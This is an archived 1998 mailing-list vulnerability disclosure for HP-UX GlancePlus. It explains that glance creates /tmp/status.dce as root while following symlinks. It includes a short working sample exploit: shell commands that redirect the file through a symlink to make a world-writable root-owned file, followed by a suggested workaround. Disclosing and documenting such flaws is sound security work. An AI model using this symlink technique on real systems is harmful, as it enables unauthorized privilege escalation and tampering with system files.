* Software:
HP-UX B.10.20 D
Glance.Runtime.GLANCE B.10.20.95 HP GlancePlus files
* Bug:
glance creates a /tmp/status.dce file as root, and it follows
symlinks, so you can append text like
Pid: 16208 File: ndi_sm.c Line: 2609 Mon Apr 27 21:52:23 1998
Performance Management Application registered.
--------------------------------------------------------------------------
to any system file.
* Sample exploit:
$ umask 000
$ cd /tmp
$ ln -s /.test status.dce
$ glance -j 1 -iterations 1 -maxpages 1
$ ls -l /.test
-rw-rw-rw- 1 root bar 1080 Apr 27 23:06 /.test
# edit /.test to match your needs
* Workaround:
I guess creating a non writable /tmp/status.dce file
and setting the t bit on /tmp (which it seems it has
not in the default HPUX installation) would be enough
* Note: I've been looking for HP-UX bugs, and I have found
several reported holes in glance; but it seems this one
is new...
--
J.A. Gutierrez So be easy and free
when you're drinking with me
I'm a man you don't meet every day
finger me for PGP (the pogues)
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:51:28 PDT